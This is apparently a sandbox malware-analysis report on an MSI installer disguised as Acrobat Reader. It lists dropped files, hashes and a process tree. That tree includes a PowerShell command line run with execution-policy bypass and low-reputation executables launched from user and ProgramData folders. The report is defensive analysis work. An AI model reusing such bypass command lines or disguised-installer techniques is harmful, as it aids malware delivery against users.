Preview:	...@IXOS.@.....@jw.X.@.....@.....@.....@.....@.....@......&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}..Acrobat Reader..Br_i421i2-2481-125_754864.msi.@.....@.....@.....@........&.{2DB5220B-06B7-4340-8D25-6BB9D51802F1}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}2.01:\Software\Acrobat Reader\Acrobat Reader\Version.@.......@.....@.....@......&.{0D0E7F8C-B4C8-4986-A673-327EDC71EEC4}=.C:\Users\user\AppData\Roaming\Acrobat Reader\Acrobat Reader\.@.......@.....@.....@......&.{91BA76A9-0280-497F-BFC0-A4C75CDB0602}3.C:\Users\user\AppData\Local\appData\mrt100_app.dll.@.......@.....@.....@......&.{FA03198F-B392-4134-AD20-DF29AC352441}5.C:\Users\user\AppData\Local\appData\msvcp140_app.dll.@.......@.....@.....@......&.{85

C:\Windows\Installer\MSI435B.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	664896
Entropy (8bit):	6.580379078260005
Encrypted:	false
SSDEEP:	12288:FurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKgy:UihNREtRdYndJP32R7vKG+47/L025zEe
MD5:	6EA44A4959FF6754793EABF80EB134D6
SHA1:	FAC049850CA944EC17CDA0C20DFBC3A30F348611
SHA-256:	7A23E492658E6D38873F3AD82F41EC1FA45102DA59FA8D87595D85DAFCA6FA98
SHA-512:	E620835985A8EF03A55AF210D156F9DFA6313D4C36131EA17FDAD9B6ACAB37214041535EFE99B7A33355CE8D5FF88E0C1ED10719726F4A23B51650CF7B15AE13
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.:.w.T,w.T,w.T,..W-z.T,..Q-.T,..P-a.T,..P-f.T,..W-m.T,..Q-+.T,..U-`.T,w.U,\.T,n.]-@.T,n.T-v.T,n.,v.T,w..,v.T,n.V-v.T,Richw.T,........PE..L....=.d.........."!...$.r..................................................0............@..........................q.......q..........................@=.......\......p...............................@............................................text....q.......r.................. ..`.rdata..v............v..............@..@.data................h..............@....rsrc...............................@..@.reloc...\.......^..................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{B95F3E55-F3A2-459E-ACB1-42A9918E3822}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.173106227748796
Encrypted:	false
SSDEEP:	12:JSbX72FjhiAGiLIlHVRpIh/7777777777777777777777777vDHFcc/RTHrl0i8Q:JaQI5wpQF
MD5:	A34FEB842CEC6AE082275B9E92A11A1A
SHA1:	5B6EA68AA17C3F54D62EC71482CC5F0A78E06710
SHA-256:	F74C2CAC8A0F608A7175EE098237E0144B5E3C397272D927DE3F5FC235E80D05
SHA-512:	8C232D8D8581E1B2E258D9D701FED880F2F866CD88CF01B34162A4443585D72206D6E1927666DD3B3AC97DFE33AA3A2B47668E46A18EA09ADD8B3B76E2507F15
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5556300542710129
Encrypted:	false
SSDEEP:	48:x8Ph8uRc06WXJ6FT5O1aNwIrLLLGvSCLLGRAECiCyjeo0LLGvSCLLGlTu8u:Mh81xFT/NwUfgLJEChgL2
MD5:	C959BA472E0A152B018CC94F6FB017E4
SHA1:	2BF6D944ACA15550BA11AD8A96806CB425A67621
SHA-256:	20172212A39ED3D9C4D86D4F3F5CCE40A937EA42ACB20FBEE934F3E1F5231F92
SHA-512:	5159B0BE637B902AF4D46BFD4C258F65D9AD045571092468EF0DB6C2B9EE55419A9077ABEA0FDC367D582E197B605D8989F23F1AE45F23645DEBFE3E374E4334
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.37518983377441
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauH:zTtbmkExhMJCIpEre
MD5:	919D86BA14B358122B2DDC9DE8E9DBE0
SHA1:	08C890B52E9CF497A12C9D3DE196E000A80ED8A5
SHA-256:	5E7858108B014BE5749BEE5F99C56A87FE634830B572F14BFD189980D09A231F
SHA-512:	12A6C5801DC8FAE8A340A6D8F3F3BBA048F318B6FF3E234C835F6497252DEDBC18C026078963C4252E0FEC944278254DF65D72CB97DD74820181C0E66BBD8120
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF030AC1A6B470813A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF249FF4A81CEC50A5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5556300542710129
Encrypted:	false
SSDEEP:	48:x8Ph8uRc06WXJ6FT5O1aNwIrLLLGvSCLLGRAECiCyjeo0LLGvSCLLGlTu8u:Mh81xFT/NwUfgLJEChgL2
MD5:	C959BA472E0A152B018CC94F6FB017E4
SHA1:	2BF6D944ACA15550BA11AD8A96806CB425A67621
SHA-256:	20172212A39ED3D9C4D86D4F3F5CCE40A937EA42ACB20FBEE934F3E1F5231F92
SHA-512:	5159B0BE637B902AF4D46BFD4C258F65D9AD045571092468EF0DB6C2B9EE55419A9077ABEA0FDC367D582E197B605D8989F23F1AE45F23645DEBFE3E374E4334
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2F56BE0322273DFA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3ACE805C130034D7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF45C782A85B1BC005.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2475990879479573
Encrypted:	false
SSDEEP:	48:pL0ukWO+CFXJrT5m1aNwIrLLLGvSCLLGRAECiCyjeo0LLGvSCLLGlTu8u:J0DTTHNwUfgLJEChgL2
MD5:	E84EC38AC222F1558A74024F2FFB585C
SHA1:	568CD368C65E517D88A52546600B3201DFC26ED7
SHA-256:	5FE8585CC8355E61ADFC8DD7D6BBD75D7A56C64D30755B773A949FDA92399DD1
SHA-512:	EC3037384FEB244C2A4CA4B56C6D606D2F86278621156693DD1243455C8DA34BA2E6887AC064745B038BECDD7F3362B799321309640F6EDCC874BAF7B1A578C5
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6AC326494C7E6F0F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07809536789804389
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKO4Zc/iH6PM8hiVky6l51:2F0i8n0itFzDHFcc/RTHr
MD5:	C03C29EF4BEA24B4492689A37F4ADA63
SHA1:	AE82D0AFCB97B7EB3823436ACEA8254CE3749536
SHA-256:	7594748A0E2BA1F7E259AE3AEEEFAB8E6F366EDE850BFA3D3118BB02E89F5DED
SHA-512:	AC22B380A09DF41067AA7CF6C74F64240F9A70100088D1A4E2107065B60D92C4888B30AEE15CB1D6E49E513AED40778CC1E56B4AA09567FD27A994D52E64C4CA
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF713A5559E2D8AB5D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2475990879479573
Encrypted:	false
SSDEEP:	48:pL0ukWO+CFXJrT5m1aNwIrLLLGvSCLLGRAECiCyjeo0LLGvSCLLGlTu8u:J0DTTHNwUfgLJEChgL2
MD5:	E84EC38AC222F1558A74024F2FFB585C
SHA1:	568CD368C65E517D88A52546600B3201DFC26ED7
SHA-256:	5FE8585CC8355E61ADFC8DD7D6BBD75D7A56C64D30755B773A949FDA92399DD1
SHA-512:	EC3037384FEB244C2A4CA4B56C6D606D2F86278621156693DD1243455C8DA34BA2E6887AC064745B038BECDD7F3362B799321309640F6EDCC874BAF7B1A578C5
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF737FEAFB5F47DDDF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.13461989202445307
Encrypted:	false
SSDEEP:	48:VuMxTeLLGvSCLLGOLLGvSCLLGRAECiCyjeohACNwtI:VCgLhgLJECidNw
MD5:	3461A03981B4B2BE239C48D431BD5AAB
SHA1:	C72482A4559CD445B83456CABDA4F637205179BA
SHA-256:	FC5CDDCFDB1249BC21514FE0DD5C263516915E845781F578AC21DE3035DB2DAB
SHA-512:	A60FB3C9A42EA79174B7C2C13EBD2E86AF2B7F97356D91FCB426F23220728347C89A8B181BE66B56B048B48FEA01935D7E6C67561F1A132DC2175F6B5C0EB21E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA6F00C61547C5A95.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2475990879479573
Encrypted:	false
SSDEEP:	48:pL0ukWO+CFXJrT5m1aNwIrLLLGvSCLLGRAECiCyjeo0LLGvSCLLGlTu8u:J0DTTHNwUfgLJEChgL2
MD5:	E84EC38AC222F1558A74024F2FFB585C
SHA1:	568CD368C65E517D88A52546600B3201DFC26ED7
SHA-256:	5FE8585CC8355E61ADFC8DD7D6BBD75D7A56C64D30755B773A949FDA92399DD1
SHA-512:	EC3037384FEB244C2A4CA4B56C6D606D2F86278621156693DD1243455C8DA34BA2E6887AC064745B038BECDD7F3362B799321309640F6EDCC874BAF7B1A578C5
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFCADE276437B8876E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5556300542710129
Encrypted:	false
SSDEEP:	48:x8Ph8uRc06WXJ6FT5O1aNwIrLLLGvSCLLGRAECiCyjeo0LLGvSCLLGlTu8u:Mh81xFT/NwUfgLJEChgL2
MD5:	C959BA472E0A152B018CC94F6FB017E4
SHA1:	2BF6D944ACA15550BA11AD8A96806CB425A67621
SHA-256:	20172212A39ED3D9C4D86D4F3F5CCE40A937EA42ACB20FBEE934F3E1F5231F92
SHA-512:	5159B0BE637B902AF4D46BFD4C258F65D9AD045571092468EF0DB6C2B9EE55419A9077ABEA0FDC367D582E197B605D8989F23F1AE45F23645DEBFE3E374E4334
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD735E1EFE24DAF39.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF86D41EBB18B0485.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466058288802192
Encrypted:	false
SSDEEP:	6144:6IXfpi67eLPU9skLmb0b4cWSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbO:PXD94cWlLZMM6YFHU+O
MD5:	F874B33EBBEC82EE5898CDDADACAD43D
SHA1:	2C83E0EA9E10F5C56EDACF150FAD8F73ED5FA23A
SHA-256:	A8B3772865BE29B6B9812EDEA4DBCB0F78BB8B336B5C7A4D5765341A17ACE494
SHA-512:	9AC8A03684D573B83C54564CEBAD49FE8F12DE4B466462D71258EEF5EBE7124C30DF6E96FE7BA51A03365490B7E253E7038ACE159D2CFE9E9EF647681295CBDF
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.."...................................................................................................................................................................................................................................................................................................................................................4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2DB5220B-06B7-4340-8D25-6BB9D51802F1}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed May 22 20:11:17 2024, Number of Pages: 200
Entropy (8bit):	7.8856938835516495
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	Br_i421i2-2481-125_754864.msi
File size:	9'782'272 bytes
MD5:	dc2ff54f9664f90f09004b367fbdca10
SHA1:	e0dd52a75514bae7e68396e953eab1a62e567aa5
SHA256:	0cc32738dd2dbf5d0c128a9029783b6daa691c999683feae8b9caa4c0805eaad
SHA512:	3032476f1e6511371322c79fff6a45ccb5cc3c79a01db470f1c3c207e3557272b7f1b306218af46bc96cae243da843dae5f1006dff5e225e0d1deec3c552fcf5
SSDEEP:	196608:r/i0OAYet5vLXFZf6eB1No6Zd4vvrm89UcP7fbUDd57U8:Ti0OAY+N5ZfHB16RHrm8VT6Q
TLSH:	ABA61222B287C137C56D0273E968FE5E157DBE730B3104E7B7E8396E99B08C15676A02
File Content Preview:	........................>.......................................................F.......b.......t.......................................s...............................................~......................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Target ID:	0
Start time:	14:59:17
Start date:	24/05/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Br_i421i2-2481-125_754864.msi"
Imagebase:	0x7ff7d0cd0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:59:17
Start date:	24/05/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7d0cd0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:59:18
Start date:	24/05/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B
Imagebase:	0x740000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:59:19
Start date:	24/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Imagebase:	0x630000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:59:20
Start date:	24/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:59:51
Start date:	24/05/2024
Path:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"
Imagebase:	0x7ff619490000
File size:	55'808 bytes
MD5 hash:	53AB9B8198E8AD8D3A043F40E72B1AB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:59:56
Start date:	24/05/2024
Path:	C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
Imagebase:	0x7ff63edb0000
File size:	2'790'176 bytes
MD5 hash:	1913EFB2223B24D2A47FAD0A1AAD8F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:00:17
Start date:	24/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2500 -s 580
Imagebase:	0x7ff6c57c0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 06C50F98 Relevance: 7.7, Strings: 6, Instructions: 220COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C510D6
$^q, xrefs: 06C51110
$^q, xrefs: 06C5107B
$^q, xrefs: 06C510E6
$^q, xrefs: 06C5105A
$^q, xrefs: 06C51100

Memory Dump Source

Source File: 00000003.00000002.2012825317.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c50000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 90e4cbd3729e8270cec592c7b025a1a30d51fbf58867db3c0ee7cae6f2dc2ebb
Instruction ID: 2fa20f6e849421f7b098b31973e71ac64a8de90973c0c0e94892f22ffbb735a3
Opcode Fuzzy Hash: 90e4cbd3729e8270cec592c7b025a1a30d51fbf58867db3c0ee7cae6f2dc2ebb
Instruction Fuzzy Hash: 99710730B002489FDB549E69DC09BBE7BE5AF84350F19846AE805CF691DF35CAC0C7A5

Function 06C50F78 Relevance: 5.1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C510D6
$^q, xrefs: 06C5107B
$^q, xrefs: 06C5105A
$^q, xrefs: 06C51100

Memory Dump Source

Source File: 00000003.00000002.2012825317.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c50000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 06d0204f3c32b7080f951c7b0325d98cd6551bf2663d1f2942187bc157b9eaa1
Instruction ID: f91f4df748c7bf292a9ed3d0f91af389a55a28d6762e9fcd6d34ee3702bc0102
Opcode Fuzzy Hash: 06d0204f3c32b7080f951c7b0325d98cd6551bf2663d1f2942187bc157b9eaa1
Instruction Fuzzy Hash: DC41E530A04284DFDBA48F25CD497BA3BF1AB41351F0A816ADC15CB591DB38CAC0CBA9

Function 0403A820 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0403A8CD
(Xcq, xrefs: 0403A9AF

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 3c92f4aa7b6a3af6998276b171a1b76574b7d9bc44733667d3297d479d6e010e
Instruction ID: 3b4ea863aaf46e69e6397b61ddf5bed976775e9e8de682bdea16ffd50fef303c
Opcode Fuzzy Hash: 3c92f4aa7b6a3af6998276b171a1b76574b7d9bc44733667d3297d479d6e010e
Instruction Fuzzy Hash: E3528C30B00218CFEB24DB64C858B6DBBB6BF85304F118199E949AB3A5DF34AD85CF51

Function 0403A650 Relevance: 2.9, Strings: 2, Instructions: 368COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0403A8CD
(Xcq, xrefs: 0403A9AF

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 13fcad0169d84bae7dc906ebb3db492ed73ec6a1934cfb43879d8011b68d5fd0
Instruction ID: b65d4547b3ad31bf9b0f3e1cd7e9aebafd20c71f9e497b1a7e945ddf28fab1ac
Opcode Fuzzy Hash: 13fcad0169d84bae7dc906ebb3db492ed73ec6a1934cfb43879d8011b68d5fd0
Instruction Fuzzy Hash: 75514A30B002188FDB14DF68C844BADBBB6FF89304F11419AE545AB3A5DB75AD41CF91

Function 040336B0 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8edb94e1ad77cb2a45a5248d96aec1f23941cd4e0127bd640e8339503a2a43e8
Instruction ID: 6537e4f6ce96b0e1d173d7e69c10323c72cd15e4f85a52e13a4f3becd2edabb4
Opcode Fuzzy Hash: 8edb94e1ad77cb2a45a5248d96aec1f23941cd4e0127bd640e8339503a2a43e8
Instruction Fuzzy Hash: 7F429D706043419FC715CF28C4D0AAABBF6FF89305B14899AD885DB7A6DB35F842CB52

Function 0403A120 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae565819d3ce205b9f632a519e72aed0dafb8cc458dded78d77e61c6e0fd5e5
Instruction ID: 4e8030ff1a2e1321c6b604e5fe07a2c431dc9de5509d144212cfc4266eff4f4f
Opcode Fuzzy Hash: aae565819d3ce205b9f632a519e72aed0dafb8cc458dded78d77e61c6e0fd5e5
